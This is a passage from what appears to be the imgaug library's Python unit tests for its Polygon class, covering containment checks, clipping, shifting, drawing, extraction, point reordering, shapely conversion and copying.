poly = ia.Polygon([(0, 0), (0.999, 0), (0.999, 0.999), (0, 0.999)])
assert poly.is_fully_within_image((1, 1, 3))
poly = ia.Polygon([(0, 0), (0.999, 0), (0.999, 0.999), (0, 0.999)])
assert poly.is_fully_within_image((1, 1))
poly = ia.Polygon([(0, 0), (0.999, 0), (0.999, 0.999), (0, 0.999)])
assert poly.is_fully_within_image(np.zeros((1, 1, 3), dtype=np.uint8))
poly = ia.Polygon([(0, 0), (1, 0), (1, 1), (0, 1)])
assert not poly.is_fully_within_image((1, 1, 3))
poly = ia.Polygon([(0, 0), (1, 0), (1, 1), (0, 1)])
assert not poly.is_fully_within_image((1, 1))
poly = ia.Polygon([(0, 0), (1, 0), (1, 1), (0, 1)])
assert not poly.is_fully_within_image(np.zeros((1, 1, 3), dtype=np.uint8))
poly = ia.Polygon([(100, 100), (101, 100), (101, 101), (100, 101)])
assert not poly.is_fully_within_image((1, 1, 3))
def test_Polygon_is_partly_within_image():
poly = ia.Polygon([(0, 0), (0.999, 0), (0.999, 0.999), (0, 0.999)])
assert poly.is_partly_within_image((1, 1, 3))
poly = ia.Polygon([(0, 0), (0.999, 0), (0.999, 0.999), (0, 0.999)])
assert poly.is_partly_within_image((1, 1))
poly = ia.Polygon([(0, 0), (0.999, 0), (0.999, 0.999), (0, 0.999)])
assert poly.is_partly_within_image(np.zeros((1, 1, 3), dtype=np.uint8))
poly = ia.Polygon([(0, 0), (1, 0), (1, 1), (0, 1)])
assert poly.is_partly_within_image((1, 1, 3))
poly = ia.Polygon([(0, 0), (1, 0), (1, 1), (0, 1)])
assert poly.is_partly_within_image((1, 1))
poly = ia.Polygon([(0, 0), (1, 0), (1, 1), (0, 1)])
assert poly.is_partly_within_image(np.zeros((1, 1, 3), dtype=np.uint8))
poly = ia.Polygon([(100, 100), (101, 100), (101, 101), (100, 101)])
assert not poly.is_partly_within_image((1, 1, 3))
poly = ia.Polygon([(100, 100), (101, 100), (101, 101), (100, 101)])
assert not poly.is_partly_within_image((1, 1))
poly = ia.Polygon([(100, 100), (101, 100), (101, 101), (100, 101)])
assert not poly.is_partly_within_image(np.zeros((1, 1, 3), dtype=np.uint8))
def test_Polygon_is_out_of_image():
for shape in [(1, 1, 3), (1, 1), np.zeros((1, 1, 3), dtype=np.uint8)]:
poly = ia.Polygon([(0, 0), (0.999, 0), (0.999, 0.999), (0, 0.999)])
assert not poly.is_out_of_image(shape, partly=False, fully=False)
assert not poly.is_out_of_image(shape, partly=True, fully=False)
assert not poly.is_out_of_image(shape, partly=False, fully=True)
assert not poly.is_out_of_image(shape, partly=True, fully=True)
poly = ia.Polygon([(0, 0), (1, 0), (1, 1), (0, 1)])
shape = np.zeros((1, 1, 3), dtype=np.uint8)
assert not poly.is_out_of_image(shape, partly=False, fully=False)
assert poly.is_out_of_image(shape, partly=True, fully=False)
assert not poly.is_out_of_image(shape, partly=False, fully=True)
assert poly.is_out_of_image(shape, partly=True, fully=True)
poly = ia.Polygon([(100, 100), (101, 100), (101, 101), (100, 101)])
shape = (1, 1, 3)
assert not poly.is_out_of_image(shape, partly=False, fully=False)
assert not poly.is_out_of_image(shape, partly=True, fully=False)
assert poly.is_out_of_image(shape, partly=False, fully=True)
assert poly.is_out_of_image(shape, partly=True, fully=True)
poly = ia.Polygon([])
got_exception = False
try:
poly.is_out_of_image((1, 1, 3))
except Exception as exc:
assert "Cannot determine whether the polygon is inside the image" in str(exc)
got_exception = True
assert got_exception
def test_Polygon_cut_out_of_image():
with warnings.catch_warnings(record=True) as caught_warnings:
# Cause all warnings to always be triggered.
warnings.simplefilter("always")
# Trigger a warning.
_test_Polygon_cut_clip(lambda poly, image: poly.cut_out_of_image(image))
# Verify
# get multiple warnings here, one for each function call
assert all([
"is deprecated" in str(msg.message)
for msg in caught_warnings])
def test_Polygon_clip_out_of_image():
_test_Polygon_cut_clip(lambda poly, image: poly.clip_out_of_image(image))
def _test_Polygon_cut_clip(func):
# poly inside image
poly = ia.Polygon([(0, 0), (1, 0), (1, 1), (0, 1)], label=None)
image = np.zeros((1, 1, 3), dtype=np.uint8)
multipoly_clipped = func(poly, image)
assert isinstance(multipoly_clipped, list)
assert len(multipoly_clipped) == 1
assert multipoly_clipped[0].exterior_almost_equals(poly.exterior)
assert multipoly_clipped[0].label is None
# square poly shifted by x=0.5, y=0.5 => half out of image
poly = ia.Polygon([(0.5, 0.5), (1.5, 0.5), (1.5, 1.5), (0.5, 1.5)], label="test")
image = np.zeros((1, 1, 3), dtype=np.uint8)
multipoly_clipped = func(poly, image)
assert isinstance(multipoly_clipped, list)
assert len(multipoly_clipped) == 1
assert multipoly_clipped[0].exterior_almost_equals(np.float32([
[0.5, 0.5],
[1.0, 0.5],
[1.0, 1.0],
[0.5, 1.0]
]))
assert multipoly_clipped[0].label == "test"
# non-square poly, with one rectangle on the left side of the image and one on the right side,
# both sides are connected by a thin strip below the image
# after clipping it should become two rectangles
poly = ia.Polygon([(-0.1, 0.0), (0.4, 0.0), (0.4, 1.1), (0.6, 1.1), (0.6, 0.0), (1.1, 0.0),
(1.1, 1.2), (-0.1, 1.2)],
label="test")
image = np.zeros((1, 1, 3), dtype=np.uint8)
multipoly_clipped = func(poly, image)
assert isinstance(multipoly_clipped, list)
assert len(multipoly_clipped) == 2
assert multipoly_clipped[0].exterior_almost_equals(np.float32([
[0.0, 0.0],
[0.4, 0.0],
[0.4, 1.0],
[0.0, 1.0]
]))
assert multipoly_clipped[0].label == "test"
assert multipoly_clipped[1].exterior_almost_equals(np.float32([
[0.6, 0.0],
[1.0, 0.0],
[1.0, 1.0],
[0.6, 1.0]
]))
assert multipoly_clipped[0].label == "test"
# poly outside of image
poly = ia.Polygon([(10.0, 10.0)])
multipoly_clipped = func(poly, (5, 5, 3))
assert isinstance(multipoly_clipped, list)
assert len(multipoly_clipped) == 0
def test_Polygon_shift():
poly = ia.Polygon([(0, 0), (1, 0), (1, 1), (0, 1)], label="test")
# make sure that shift does not change poly inplace
poly_shifted = poly.shift(top=1)
assert np.allclose(poly.exterior, np.float32([
[0, 0],
[1, 0],
[1, 1],
[0, 1]
]))
assert np.allclose(poly_shifted.exterior, np.float32([
[0, 1],
[1, 1],
[1, 2],
[0, 2]
]))
for v in [1, 0, -1, 0.5]:
# top/bottom
poly_shifted = poly.shift(top=v)
assert np.allclose(poly_shifted.exterior, np.float32([
[0, 0 + v],
[1, 0 + v],
[1, 1 + v],
[0, 1 + v]
]))
assert poly_shifted.label == "test"
poly_shifted = poly.shift(bottom=v)
assert np.allclose(poly_shifted.exterior, np.float32([
[0, 0 - v],
[1, 0 - v],
[1, 1 - v],
[0, 1 - v]
]))
assert poly_shifted.label == "test"
poly_shifted = poly.shift(top=v, bottom=-v)
assert np.allclose(poly_shifted.exterior, np.float32([
[0, 0 + 2*v],
[1, 0 + 2*v],
[1, 1 + 2*v],
[0, 1 + 2*v]
]))
assert poly_shifted.label == "test"
# left/right
poly_shifted = poly.shift(left=v)
assert np.allclose(poly_shifted.exterior, np.float32([
[0 + v, 0],
[1 + v, 0],
[1 + v, 1],
[0 + v, 1]
]))
assert poly_shifted.label == "test"
poly_shifted = poly.shift(right=v)
assert np.allclose(poly_shifted.exterior, np.float32([
[0 - v, 0],
[1 - v, 0],
[1 - v, 1],
[0 - v, 1]
]))
assert poly_shifted.label == "test"
poly_shifted = poly.shift(left=v, right=-v)
assert np.allclose(poly_shifted.exterior, np.float32([
[0 + 2 * v, 0],
[1 + 2 * v, 0],
[1 + 2 * v, 1],
[0 + 2 * v, 1]
]))
assert poly_shifted.label == "test"
def test_Polygon_draw_on_image():
image = np.tile(np.arange(100).reshape(10, 10, 1), (1, 1, 3)).astype(np.uint8)
# simple drawing of square
poly = ia.Polygon([(2, 2), (8, 2), (8, 8), (2, 8)])
image_poly = poly.draw_on_image(image,
color=[32, 128, 32],
color_fill=[32, 128, 32],
color_perimeter=[0, 255, 0],
color_points=[0, 255, 0],
alpha=1.0,
alpha_fill=1.0,
alpha_perimeter=1.0,
alpha_points=0.0,
raise_if_out_of_image=False)
assert image_poly.dtype.type == np.uint8
assert image_poly.shape == (10, 10, 3)
assert np.sum(image) == 3 * np.sum(np.arange(100)) # draw did not change original image (copy=True)
for c_idx, value in enumerate([0, 255, 0]):
assert np.all(image_poly[2:9, 2:3, c_idx] == np.zeros((7, 1), dtype=np.uint8) + value) # left boundary
assert np.all(image_poly[2:9, 8:9, c_idx] == np.zeros((7, 1), dtype=np.uint8) + value) # right boundary
assert np.all(image_poly[2:3, 2:9, c_idx] == np.zeros((1, 7), dtype=np.uint8) + value) # top boundary
assert np.all(image_poly[8:9, 2:9, c_idx] == np.zeros((1, 7), dtype=np.uint8) + value) # bottom boundary
expected = np.tile(np.uint8([32, 128, 32]).reshape((1, 1, 3)), (5, 5, 1))
assert np.all(image_poly[3:8, 3:8, :] == expected)
# simple drawing of square, use only "color" arg
poly = ia.Polygon([(2, 2), (8, 2), (8, 8), (2, 8)])
image_poly = poly.draw_on_image(image,
color=[0, 255, 0],
alpha=1.0,
alpha_fill=1.0,
alpha_perimeter=1.0,
alpha_points=0.0,
raise_if_out_of_image=False)
assert image_poly.dtype.type == np.uint8
assert image_poly.shape == (10, 10, 3)
assert np.sum(image) == 3 * np.sum(np.arange(100)) # draw did not change original image (copy=True)
for c_idx, value in enumerate([0, 0.5*255, 0]):
value = int(value)
assert np.all(image_poly[2:9, 2:3, c_idx] == np.zeros((7, 1), dtype=np.uint8) + value) # left boundary
assert np.all(image_poly[2:9, 8:9, c_idx] == np.zeros((7, 1), dtype=np.uint8) + value) # right boundary
assert np.all(image_poly[2:3, 2:9, c_idx] == np.zeros((1, 7), dtype=np.uint8) + value) # top boundary
assert np.all(image_poly[8:9, 2:9, c_idx] == np.zeros((1, 7), dtype=np.uint8) + value) # bottom boundary
expected = np.tile(np.uint8([0, 255, 0]).reshape((1, 1, 3)), (5, 5, 1))
assert np.all(image_poly[3:8, 3:8, :] == expected)
# simple drawing of square with float32 input
poly = ia.Polygon([(2, 2), (8, 2), (8, 8), (2, 8)])
image_poly = poly.draw_on_image(image.astype(np.float32),
color=[32, 128, 32],
color_fill=[32, 128, 32],
color_perimeter=[0, 255, 0],
color_points=[0, 255, 0],
alpha=1.0,
alpha_fill=1.0,
alpha_perimeter=1.0,
alpha_points=0.0,
raise_if_out_of_image=False)
assert image_poly.dtype.type == np.float32
assert image_poly.shape == (10, 10, 3)
for c_idx, value in enumerate([0, 255, 0]):
assert np.allclose(image_poly[2:9, 2:3, c_idx], np.zeros((7, 1), dtype=np.float32) + value) # left boundary
assert np.allclose(image_poly[2:9, 8:9, c_idx], np.zeros((7, 1), dtype=np.float32) + value) # right boundary
assert np.allclose(image_poly[2:3, 2:9, c_idx], np.zeros((1, 7), dtype=np.float32) + value) # top boundary
assert np.allclose(image_poly[8:9, 2:9, c_idx], np.zeros((1, 7), dtype=np.float32) + value) # bottom boundary
expected = np.tile(np.float32([32, 128, 32]).reshape((1, 1, 3)), (5, 5, 1))
assert np.allclose(image_poly[3:8, 3:8, :], expected)
# drawing of poly that is half out of image
poly = ia.Polygon([(2, 2+5), (8, 2+5), (8, 8+5), (2, 8+5)])
image_poly = poly.draw_on_image(image,
color=[32, 128, 32],
color_fill=[32, 128, 32],
color_perimeter=[0, 255, 0],
color_points=[0, 255, 0],
alpha=1.0,
alpha_fill=1.0,
alpha_perimeter=1.0,
alpha_points=0.0,
raise_if_out_of_image=False)
assert image_poly.dtype.type == np.uint8
assert image_poly.shape == (10, 10, 3)
assert np.sum(image) == 3 * np.sum(np.arange(100)) # draw did not change original image (copy=True)
for c_idx, value in enumerate([0, 255, 0]):
assert np.all(image_poly[2+5:, 2:3, c_idx] == np.zeros((3, 1), dtype=np.uint8) + value) # left boundary
assert np.all(image_poly[2+5:, 8:9, c_idx] == np.zeros((3, 1), dtype=np.uint8) + value) # right boundary
assert np.all(image_poly[2+5:3+5, 2:9, c_idx] == np.zeros((1, 7), dtype=np.uint8) + value) # top boundary
expected = np.tile(np.uint8([32, 128, 32]).reshape((1, 1, 3)), (2, 5, 1))
assert np.all(image_poly[3+5:, 3:8, :] == expected)
# drawing of poly that is half out of image, with raise_if_out_of_image=True
poly = ia.Polygon([(2, 2+5), (8, 2+5), (8, 8+5), (0, 8+5)])
got_exception = False
try:
_ = poly.draw_on_image(image,
color=[32, 128, 32],
color_fill=[32, 128, 32],
color_perimeter=[0, 255, 0],
color_points=[0, 255, 0],
alpha=1.0,
alpha_fill=1.0,
alpha_perimeter=1.0,
alpha_points=0.0,
raise_if_out_of_image=True)
except Exception as exc:
assert "Cannot draw polygon" in str(exc)
got_exception = True
assert not got_exception # only polygons fully outside of the image plane lead to exceptions
# drawing of poly that is fully out of image
poly = ia.Polygon([(100, 100), (100+10, 100), (100+10, 100+10), (100, 100+10)])
image_poly = poly.draw_on_image(image,
color=[32, 128, 32],
color_fill=[32, 128, 32],
color_perimeter=[0, 255, 0],
color_points=[0, 255, 0],
alpha=1.0,
alpha_fill=1.0,
alpha_perimeter=1.0,
alpha_points=0.0,
raise_if_out_of_image=False)
assert np.array_equal(image_poly, image)
# drawing of poly that is fully out of image, with raise_if_out_of_image=True
poly = ia.Polygon([(100, 100), (100+10, 100), (100+10, 100+10), (100, 100+10)])
got_exception = False
try:
_ = poly.draw_on_image(image,
color=[32, 128, 32],
color_fill=[32, 128, 32],
color_perimeter=[0, 255, 0],
color_points=[0, 255, 0],
alpha=1.0,
alpha_fill=1.0,
alpha_perimeter=1.0,
alpha_points=0.0,
raise_if_out_of_image=True)
except Exception as exc:
assert "Cannot draw polygon" in str(exc)
got_exception = True
assert got_exception
# face invisible via alpha
poly = ia.Polygon([(2, 2), (8, 2), (8, 8), (2, 8)])
image_poly = poly.draw_on_image(image,
color=[32, 128, 32],
color_fill=[32, 128, 32],
color_perimeter=[0, 255, 0],
color_points=[0, 255, 0],
alpha=1.0,
alpha_fill=0.0,
alpha_perimeter=1.0,
alpha_points=0.0,
raise_if_out_of_image=False)
assert image_poly.dtype.type == np.uint8
assert image_poly.shape == (10, 10, 3)
assert np.sum(image) == 3 * np.sum(np.arange(100)) # draw did not change original image (copy=True)
for c_idx, value in enumerate([0, 255, 0]):
assert np.all(image_poly[2:9, 2:3, c_idx] == np.zeros((7, 1), dtype=np.uint8) + value) # left boundary
assert np.all(image_poly[3:8, 3:8, :] == image[3:8, 3:8, :])
# boundary invisible via alpha
poly = ia.Polygon([(2, 2), (8, 2), (8, 8), (2, 8)])
image_poly = poly.draw_on_image(image,
color=[32, 128, 32],
color_fill=[32, 128, 32],
color_perimeter=[0, 255, 0],
color_points=[0, 255, 0],
alpha=1.0,
alpha_fill=1.0,
alpha_perimeter=0.0,
alpha_points=0.0,
raise_if_out_of_image=False)
assert image_poly.dtype.type == np.uint8
assert image_poly.shape == (10, 10, 3)
assert np.sum(image) == 3 * np.sum(np.arange(100)) # draw did not change original image (copy=True)
expected = np.tile(np.uint8([32, 128, 32]).reshape((1, 1, 3)), (6, 6, 1))
assert np.all(image_poly[2:8, 2:8, :] == expected)
# alpha=0.8
poly = ia.Polygon([(2, 2), (8, 2), (8, 8), (2, 8)])
image_poly = poly.draw_on_image(image,
color=[32, 128, 32],
color_fill=[32, 128, 32],
color_perimeter=[0, 255, 0],
color_points=[0, 255, 0],
alpha=0.8,
alpha_points=0.0,
raise_if_out_of_image=False)
assert image_poly.dtype.type == np.uint8
assert image_poly.shape == (10, 10, 3)
for c_idx, value in enumerate([0, 255, 0]):
assert np.all(
image_poly[2:9, 8:9, c_idx] ==
(
(1-0.8)*image[2:9, 8:9, c_idx]
+ np.full((7, 1), 0.8*value, dtype=np.float32)
).astype(np.uint8)
) # right boundary
expected = (0.8 * 0.5) * np.tile(np.uint8([32, 128, 32]).reshape((1, 1, 3)), (5, 5, 1)) \
+ (1 - (0.8 * 0.5)) * image[3:8, 3:8, :]
assert np.all(image_poly[3:8, 3:8, :] == expected.astype(np.uint8))
# alpha of fill and perimeter 0.5
poly = ia.Polygon([(2, 2), (8, 2), (8, 8), (2, 8)])
image_poly = poly.draw_on_image(image,
color=[32, 128, 32],
color_fill=[32, 128, 32],
color_perimeter=[0, 255, 0],
color_points=[0, 255, 0],
alpha=1.0,
alpha_fill=0.5,
alpha_perimeter=0.5,
alpha_points=0.0,
raise_if_out_of_image=False)
assert image_poly.dtype.type == np.uint8
assert image_poly.shape == (10, 10, 3)
for c_idx, value in enumerate([0, 255, 0]):
assert np.all(
image_poly[2:9, 8:9, c_idx] ==
(
0.5*image[2:9, 8:9, c_idx]
+ np.full((7, 1), 0.5*value, dtype=np.float32)
).astype(np.uint8)
) # right boundary
expected = 0.5 * np.tile(np.uint8([32, 128, 32]).reshape((1, 1, 3)), (5, 5, 1)) \
+ 0.5 * image[3:8, 3:8, :]
assert np.all(image_poly[3:8, 3:8, :] == expected.astype(np.uint8))
# copy=False
# test deactivated as the function currently does not offer a copy argument
"""
image_cp = np.copy(image)
poly = ia.Polygon([(2, 2), (8, 2), (8, 8), (2, 8)])
image_poly = poly.draw_on_image(image_cp,
color_face=[32, 128, 32], color_boundary=[0, 255, 0],
alpha_face=1.0, alpha_boundary=1.0,
raise_if_out_of_image=False)
assert image_poly.dtype.type == np.uint8
assert image_poly.shape == (10, 10, 3)
assert np.all(image_cp == image_poly)
assert not np.all(image_cp == image)
for c_idx, value in enumerate([0, 255, 0]):
assert np.all(image_poly[2:9, 2:3, c_idx] == np.zeros((6, 1, 3), dtype=np.uint8) + value) # left boundary
assert np.all(image_cp[2:9, 2:3, c_idx] == np.zeros((6, 1, 3), dtype=np.uint8) + value) # left boundary
expected = np.tile(np.uint8([32, 128, 32]).reshape((1, 1, 3)), (5, 5, 1))
assert np.all(image_poly[3:8, 3:8, :] == expected)
assert np.all(image_cp[3:8, 3:8, :] == expected)
"""
def test_Polygon_extract_from_image():
image = np.arange(20*20*2).reshape(20, 20, 2).astype(np.int32)
# inside image and completely covers it
poly = ia.Polygon([(0, 0), (10, 0), (10, 10), (0, 10)])
subimage = poly.extract_from_image(image)
assert np.array_equal(subimage, image[0:10, 0:10, :])
# inside image, subpart of it (not all may be extracted)
poly = ia.Polygon([(1, 1), (9, 1), (9, 9), (1, 9)])
subimage = poly.extract_from_image(image)
assert np.array_equal(subimage, image[1:9, 1:9, :])
# inside image, two image areas that don't belong to the polygon but have to be extracted
poly = ia.Polygon([(0, 0), (10, 0), (10, 5), (20, 5),
(20, 20), (10, 20), (10, 5), (0, 5)])
subimage = poly.extract_from_image(image)
expected = np.copy(image)
expected[:5, 10:, :] = 0 # top right block
expected[5:, :10, :] = 0 # left bottom block
assert np.array_equal(subimage, expected)
# partially out of image
poly = ia.Polygon([(-5, 0), (5, 0), (5, 10), (-5, 10)])
subimage = poly.extract_from_image(image)
expected = np.zeros((10, 10, 2), dtype=np.int32)
expected[0:10, 5:10, :] = image[0:10, 0:5, :]
assert np.array_equal(subimage, expected)
# fully out of image
poly = ia.Polygon([(30, 0), (40, 0), (40, 10), (30, 10)])
subimage = poly.extract_from_image(image)
expected = np.zeros((10, 10, 2), dtype=np.int32)
assert np.array_equal(subimage, expected)
# inside image, subpart of it
# float coordinates, rounded so that the whole image will be extracted
poly = ia.Polygon([(0.4, 0.4), (9.6, 0.4), (9.6, 9.6), (0.4, 9.6)])
subimage = poly.extract_from_image(image)
assert np.array_equal(subimage, image[0:10, 0:10, :])
# inside image, subpart of it
# float coordinates, rounded so that x/y 0<=i<9 will be extracted (instead of 0<=i<10)
poly = ia.Polygon([(0.5, 0.5), (9.4, 0.5), (9.4, 9.4), (0.5, 9.4)])
subimage = poly.extract_from_image(image)
assert np.array_equal(subimage, image[0:9, 0:9, :])
# inside image, subpart of it
# float coordinates, rounded so that x/y 1<=i<9 will be extracted (instead of 0<=i<10)
poly = ia.Polygon([(0.51, 0.51), (9.4, 0.51), (9.4, 9.4), (0.51, 9.4)])
subimage = poly.extract_from_image(image)
assert np.array_equal(subimage, image[1:9, 1:9, :])
# error for invalid polygons
got_exception = False
poly = ia.Polygon([(0.51, 0.51), (9.4, 0.51)])
try:
_ = poly.extract_from_image(image)
except Exception as exc:
assert "Polygon must be made up" in str(exc)
got_exception = True
assert got_exception
def test_Polygon_change_first_point_by_coords():
poly = ia.Polygon([(0, 0), (1, 0), (1, 1)])
poly_reordered = poly.change_first_point_by_coords(x=0, y=0)
assert np.allclose(poly.exterior, poly_reordered.exterior)
poly = ia.Polygon([(0, 0), (1, 0), (1, 1)])
poly_reordered = poly.change_first_point_by_coords(x=1, y=0)
# make sure that it does not reorder inplace
assert np.allclose(poly.exterior, np.float32([[0, 0], [1, 0], [1, 1]]))
assert np.allclose(poly_reordered.exterior, np.float32([[1, 0], [1, 1], [0, 0]]))
poly = ia.Polygon([(0, 0), (1, 0), (1, 1)])
poly_reordered = poly.change_first_point_by_coords(x=1, y=1)
assert np.allclose(poly_reordered.exterior, np.float32([[1, 1], [0, 0], [1, 0]]))
# inaccurate point, but close enough
poly = ia.Polygon([(0, 0), (1, 0), (1, 1)])
poly_reordered = poly.change_first_point_by_coords(x=1.0, y=0.01, max_distance=0.1)
assert np.allclose(poly_reordered.exterior, np.float32([[1, 0], [1, 1], [0, 0]]))
# inaccurate point, but close enough (infinite max distance)
poly = ia.Polygon([(0, 0), (1, 0), (1, 1)])
poly_reordered = poly.change_first_point_by_coords(x=1.0, y=0.01, max_distance=None)
assert np.allclose(poly_reordered.exterior, np.float32([[1, 0], [1, 1], [0, 0]]))
# point too far away
poly = ia.Polygon([(0, 0), (1, 0), (1, 1)])
got_exception = False
try:
_ = poly.change_first_point_by_coords(x=1.0, y=0.01, max_distance=0.001)
except Exception as exc:
assert "Closest found point " in str(exc)
got_exception = True
assert got_exception
# reorder with two points
poly = ia.Polygon([(0, 0), (1, 0)])
poly_reordered = poly.change_first_point_by_coords(x=1, y=0)
assert np.allclose(poly_reordered.exterior, np.float32([[1, 0], [0, 0]]))
# reorder with one point
poly = ia.Polygon([(0, 0)])
poly_reordered = poly.change_first_point_by_coords(x=0, y=0)
assert np.allclose(poly_reordered.exterior, np.float32([[0, 0]]))
# invalid polygon
got_exception = False
poly = ia.Polygon([])
try:
_ = poly.change_first_point_by_coords(x=0, y=0)
except Exception as exc:
assert "Cannot reorder polygon points" in str(exc)
got_exception = True
assert got_exception
def test_Polygon_change_first_point_by_index():
poly = ia.Polygon([(0, 0), (1, 0), (1, 1)])
poly_reordered = poly.change_first_point_by_index(0)
assert np.allclose(poly.exterior, poly_reordered.exterior)
poly = ia.Polygon([(0, 0), (1, 0), (1, 1)])
poly_reordered = poly.change_first_point_by_index(1)
# make sure that it does not reorder inplace
assert np.allclose(poly.exterior, np.float32([[0, 0], [1, 0], [1, 1]]))
assert np.allclose(poly_reordered.exterior, np.float32([[1, 0], [1, 1], [0, 0]]))
poly = ia.Polygon([(0, 0), (1, 0), (1, 1)])
poly_reordered = poly.change_first_point_by_index(2)
assert np.allclose(poly_reordered.exterior, np.float32([[1, 1], [0, 0], [1, 0]]))
# reorder with two points
poly = ia.Polygon([(0, 0), (1, 0)])
poly_reordered = poly.change_first_point_by_index(1)
assert np.allclose(poly_reordered.exterior, np.float32([[1, 0], [0, 0]]))
# reorder with one point
poly = ia.Polygon([(0, 0)])
poly_reordered = poly.change_first_point_by_index(0)
assert np.allclose(poly_reordered.exterior, np.float32([[0, 0]]))
# idx out of bounds
poly = ia.Polygon([(0, 0), (1, 0), (1, 1)])
got_exception = False
try:
_ = poly.change_first_point_by_index(3)
except AssertionError:
got_exception = True
assert got_exception
poly = ia.Polygon([(0, 0), (1, 0), (1, 1)])
got_exception = False
try:
_ = poly.change_first_point_by_index(-1)
except AssertionError:
got_exception = True
assert got_exception
poly = ia.Polygon([(0, 0)])
got_exception = False
try:
_ = poly.change_first_point_by_index(1)
except AssertionError:
got_exception = True
assert got_exception
poly = ia.Polygon([])
got_exception = False
try:
_ = poly.change_first_point_by_index(0)
except AssertionError:
got_exception = True
assert got_exception
def test_Polygon_to_shapely_line_string():
poly = ia.Polygon([(0, 0), (1, 0), (1, 1)])
ls = poly.to_shapely_line_string()
assert np.allclose(ls.coords, np.float32([[0, 0], [1, 0], [1, 1]]))
# two point polygon
poly = ia.Polygon([(0, 0), (1, 0)])
ls = poly.to_shapely_line_string()
assert np.allclose(ls.coords, np.float32([[0, 0], [1, 0]]))
# one point polygon
poly = ia.Polygon([(0, 0)])
got_exception = False
try:
_ = poly.to_shapely_line_string()
except Exception as exc:
assert "Conversion to shapely line string requires at least two points" in str(exc)
got_exception = True
assert got_exception
# zero point polygon
poly = ia.Polygon([])
got_exception = False
try:
_ = poly.to_shapely_line_string()
except Exception as exc:
assert "Conversion to shapely line string requires at least two points" in str(exc)
got_exception = True
assert got_exception
# closed line string
poly = ia.Polygon([(0, 0), (1, 0), (1, 1)])
ls = poly.to_shapely_line_string(closed=True)
assert np.allclose(ls.coords, np.float32([[0, 0], [1, 0], [1, 1], [0, 0]]))
# interpolation
poly = ia.Polygon([(0, 0), (1, 0), (1, 1)])
ls = poly.to_shapely_line_string(interpolate=1)
assert np.allclose(ls.coords, np.float32([[0, 0], [0.5, 0], [1, 0], [1, 0.5], [1, 1], [0.5, 0.5]]))
# interpolation with 2 steps
poly = ia.Polygon([(0, 0), (1, 0), (1, 1)])
ls = poly.to_shapely_line_string(interpolate=2)
assert np.allclose(ls.coords, np.float32([
[0, 0], [1/3, 0], [2/3, 0],
[1, 0], [1, 1/3], [1, 2/3],
[1, 1], [2/3, 2/3], [1/3, 1/3]
]))
# interpolation with closed=True
poly = ia.Polygon([(0, 0), (1, 0), (1, 1)])
ls = poly.to_shapely_line_string(closed=True, interpolate=1)
assert np.allclose(ls.coords, np.float32([[0, 0], [0.5, 0], [1, 0], [1, 0.5], [1, 1], [0.5, 0.5], [0, 0]]))
def test_Polygon_to_shapely_polygon():
exterior = [(0, 0), (1, 0), (1, 1), (0, 1)]
poly = ia.Polygon(exterior)
poly_shapely = poly.to_shapely_polygon()
for (x_exp, y_exp), (x_obs, y_obs) in zip(exterior, poly_shapely.exterior.coords):
assert x_exp - 1e-8 < x_obs < x_exp + 1e-8
assert y_exp - 1e-8 < y_obs < y_exp + 1e-8
def test_Polygon_to_bounding_box():
poly = ia.Polygon([(0, 0), (1, 0), (1, 1), (0, 1)])
bb = poly.to_bounding_box()
assert 0 - 1e-8 < bb.x1 < 0 + 1e-8
assert 0 - 1e-8 < bb.y1 < 0 + 1e-8
assert 1 - 1e-8 < bb.x2 < 1 + 1e-8
assert 1 - 1e-8 < bb.y2 < 1 + 1e-8
poly = ia.Polygon([(0.5, 0), (1, 1), (0, 1)])
bb = poly.to_bounding_box()
assert 0 - 1e-8 < bb.x1 < 0 + 1e-8
assert 0 - 1e-8 < bb.y1 < 0 + 1e-8
assert 1 - 1e-8 < bb.x2 < 1 + 1e-8
assert 1 - 1e-8 < bb.y2 < 1 + 1e-8
poly = ia.Polygon([(0.5, 0.5), (2, 0.1), (1, 1)])
bb = poly.to_bounding_box()
assert 0.5 - 1e-8 < bb.x1 < 0.5 + 1e-8
assert 0.1 - 1e-8 < bb.y1 < 0.1 + 1e-8
assert 2.0 - 1e-8 < bb.x2 < 2.0 + 1e-8
assert 1.0 - 1e-8 < bb.y2 < 1.0 + 1e-8
def test_Polygon_from_shapely():
exterior = [(0, 0), (1, 0), (1, 1), (0, 1)]
poly_shapely = shapely.geometry.Polygon(exterior)
poly = ia.Polygon.from_shapely(poly_shapely)
# shapely messes up the point ordering, so we try to correct it here
start_idx = 0
for i, (x, y) in enumerate(poly.exterior):
dist = np.sqrt((exterior[0][0] - x) ** 2 + (exterior[0][1] - x) ** 2)
if dist < 1e-4:
start_idx = i
break
poly = poly.change_first_point_by_index(start_idx)
for (x_exp, y_exp), (x_obs, y_obs) in zip(exterior, poly.exterior):
assert x_exp - 1e-8 < x_obs < x_exp + 1e-8
assert y_exp - 1e-8 < y_obs < y_exp + 1e-8
# empty polygon
poly_shapely = shapely.geometry.Polygon([])
poly = ia.Polygon.from_shapely(poly_shapely)
assert len(poly.exterior) == 0
def test_Polygon_copy():
poly = ia.Polygon([(0, 0), (1, 0), (1, 1), (0, 1)], label="test")
poly_cp = poly.copy()
assert poly.exterior.dtype.type == poly_cp.exterior.dtype.type
assert poly.exterior.shape == poly_cp.exterior.shape
assert np.allclose(poly.exterior, poly_cp.exterior)
assert poly.label == poly_cp.label
def test_Polygon_deepcopy():
poly = ia.Polygon([(0, 0), (1, 0), (1, 1), (0, 1)], label="test")
poly_cp = poly.deepcopy()
assert poly.exterior.dtype.type == poly_cp.exterior.dtype.type
assert poly.exterior.shape == poly_cp.exterior.shape
assert np.allclose(poly.exterior, poly_cp.exterior)
assert poly.label == poly_cp.label
poly = ia.Polygon([(0, 0), (1, 0), (1, 1), (0, 1)], label="test")
poly_cp = poly.deepcopy()
poly_cp.exterior[0, 0] = 100.0
poly_cp.label = "test2"
assert poly.exterior.dtype.type == poly_cp.exterior.dtype.type
assert poly.exterior.shape == poly_cp.exterior.shape
assert not np.allclose(poly.exterior, poly_cp.exterior)
assert not poly.label == poly_cp.label
def test_Polygon___repr__():
_test_Polygon_repr_str(lambda poly: poly.__repr__())
def test_Polygon___str__():
_test_Polygon_repr_str(lambda poly: poly.__str__())
def _test_Polygon_repr_str(func):
# ints
poly = ia.Polygon([(0, 0), (1, 0), (1, 1), (0, 1)], label="test")
s = func(poly)
assert s == "Polygon([(x=0.000, y=0.000), (x=1.000, y=0.000), (x=1.000, y=1.000), (x=0.000, y=1.000)] " \
+ "(4 points), label=test)"
# floats
poly = ia.Polygon([(0, 0.5), (1.5, 0), (1, 1), (0, 1)], label="test")
s = func(poly)
